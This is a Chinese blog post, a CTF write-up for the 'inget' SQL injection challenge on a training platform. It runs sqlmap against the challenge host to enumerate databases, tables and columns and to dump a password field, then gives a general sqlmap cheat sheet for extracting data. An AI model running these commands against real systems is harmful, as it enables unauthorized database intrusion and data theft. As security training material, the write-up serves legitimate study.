攻防世界-宜兴网信办-inget

最新推荐文章于 2024-05-05 13:01:16 发布
最新推荐文章于 2024-05-05 13:01:16 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: CTF 文章标签: java servlet 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/128400919
版权

题目

访问题目路径

 这个题目的意思就是请输入ID,然后尝试绕过,那应该就是SQL注入,但是呢,我是个懒狗,我直接跑sqlmap

先跑数据库名

sqlmap "http://61.147.171.105:51322/?id=1" --current-db

爆表

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber --tables

爆字段

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber --columns

 

爆数据

sqlmap "http://61.147.171.105:51322/?id=1" -D cyber -T cyber -C "pw" --dump

 

 sqlmap常用命令

注入检测方式:

get方式:sqlmap.py -u "URL"

post方式:sqlmap.py -u "URL" -date "post数据"

cookie方式:sqlmap.py -u "URL" -cookie "cookie数据"

获取数据库信息

获取数据库类型以及版本:sqlmap.py -u "URL"

获取网站使用的数据库名和用户名:sqlmap.py -u "URL" --current-db

                                                          sqlmap.py -u "URL" --current-user

获取数据量和用户权限

获取数据库的数据量:sqlmap.py -u "URL" --count -D "数据库名"

判断用户权限:sqlmap.py -u "URL" --privileges

Mysql注入

首先获取当前库名:sqlmap.py -u "URL" --current-db

其次获取库中表名:sqlmap.py -u "URL" --tables -D "数据库名"

然后获取库中某个表的列名:sqlmap.py -u "URL" --columns -T "表名" -D "库名"

最后获取库中某个表名的某个列名的字段内容:sqlmap.py -u "URL" --dump -C "列名" -T "表名" -D "库名"

仲瑿
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
中国数字乡村发展报告-中央网信&农业农村部--93页.pdf
07-26
中国数字乡村发展报告-中央网信&农业农村部--93页.pdf
产研训融合 政企社协作--省委网信以互联网思维创新建设全国首家网信人才培养基地.pdf
07-15
产研训融合 政企社协作--省委网信以互联网思维创新建设全国首家网信人才培养基地.pdf
攻防世界-宜兴网信-fileinclude
m0_49025459的博客
12-20 546
这里主要就是cookie的值,也就是language的值,源码中本身@include($lan.".php");已经添加了php后缀,所以在payload中无需再添加.php。所以依小弟拙见,我认为这是一道编译的文件包含的类型题,只不过是通过cookie进行读取了,那我们依旧可以使用伪函数进行读取文件中的内容。该函数是用于把文件的内容读入到一个字符串中的首选方法。php://filter 是一种元封装器, 设计用于数据流打开时的。由于是base64进行的输出,那么我们把输出的值进行解密即可。
攻防世界-web-inget
mlws1900的博客
08-23 802
这题目搞了半天没思路,又是从get里面传参,又是添加了header内容,一点反应都没。
攻防世界14-inget
weixin_49765221的博客
04-18 1322
sql注入的入门
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界WEB练习-inget
不知名白帽的博客
09-01 1万+
攻防世界WEB练习-inget
攻防世界--fileclude && fileinclude && inget && easytornado
08-25 2163
file2中包含数据file_get_contents。直接访问flag.php只显示WRONG WAY!说明flag应该在flag.php的注释里。file2使用php伪协议传数据。两个参数file1和file2。
安卓应用-金融理财-网信管家手机版 v3.5.0 安卓官方版.zip
08-13
安卓应用-金融理财-网信管家手机版 v3.5.0 安卓官方版.zip
20210419-《网信自主创新调研报告》编委会-2020网信自主创新调研报告.pdf
04-21
20210419-《网信自主创新调研报告》编委会-2020网信自主创新调研报告.pdf
2020中国数字乡村发展报告-中央网信&农业农村部-2020.11-93页精品报告2020.pdf
04-24
2020中国数字乡村发展报告-中央网信&农业农村部-2020.11-93页精品报告2020.pdf
攻防世界 inget
qq_53105813的博客
10-15 964
攻防世界wp
攻防世界:inget&php_rce&Web_php_include&unserialize3
weixin_74473832的博客
03-15 592
查了一下str.replace (old, new max]) 有三个参数,old是需要替换的值,new是替换后的值,max是最多替换的次数。这里的意思大概就是要用get方式提交一个page参数,但是会过滤掉page的值里面的php://。代码的意思大概是有一个xctf的类,会调用wakeup魔术方法,然后会回显bad requests。根据题目说的php-rce,去浏览器搜索这个版本的thinkphp框架的历史命令执行漏洞。这里用的是or,前后关系中只要一个对的,这个关系式就是真的,所以成功绕过。
从题目inget的解决到注释符#和--的区别及用法
2301_77004573的博客
04-26 330
**使用本题的核心工具——翻译器(bushi): 根据提示,明确了方向:sql注入 ID传参方式一般是GET(如果不是就用hackbar给url传参) 接着尝试一下符号是否闭合: 猜测闭合,接着尝试万能钥匙: 成功获得flag。答:对用户提交的表单进行验证时,网站需要查询数据库。而查询数据库就是在执行SQL语句。用户登录时,不妨假定后台执行的数据库查询操作(SQL语句)是:Select ID From users Where ID=’用户名’ 。又由于网站后台在进行数据库查询的时候没有对单引号进行过滤,
攻防世界inget(sqlmap方法)
最新发布
2302_78972359的博客
05-05 672
加上id,--dbs是用来爆数据库的,查看当前数据使用的数据库,中间可能会有提示,输入y即可。确实是sql注入,我用的是sqlmap,也可以在url构造,与sqlmap同理。这里我们查看第一个数据库cyber,输入指令,可以查看cyber库下的表名。可以看到cyber库下就一个表,也叫cyber,输入指令查看表内字段。cyber表内有三个字段,首先怀疑这个pw,查看字段内容,输入指令。打开虚拟机,终端输入sqlmap,如果是以下页面则说明可用。这个id是我们测试的参数,如果没这个id的话会像这样报错。
攻防世界新手区部分web wp 2
fcz___的博客
02-09 1263
攻防世界web新手区部分wp
写一篇500字的网信工作报告
02-12
网络信息公室工作报告 在过去一年中,网络信息公室一直致力于提高网络环境的质量和维护网民的合法权益。 首先,我们通过开展专项执法行动,整治了大量违法违规网站和网络信息,消除了负面影响,维护了网络环境...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值